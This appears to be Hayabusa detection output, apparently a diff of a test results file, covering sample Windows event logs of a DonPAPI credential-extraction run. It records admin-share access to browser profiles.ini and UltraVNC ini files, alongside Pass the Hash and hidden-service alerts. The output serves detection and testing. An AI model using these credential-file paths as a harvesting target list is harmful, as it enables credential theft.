+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724935,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
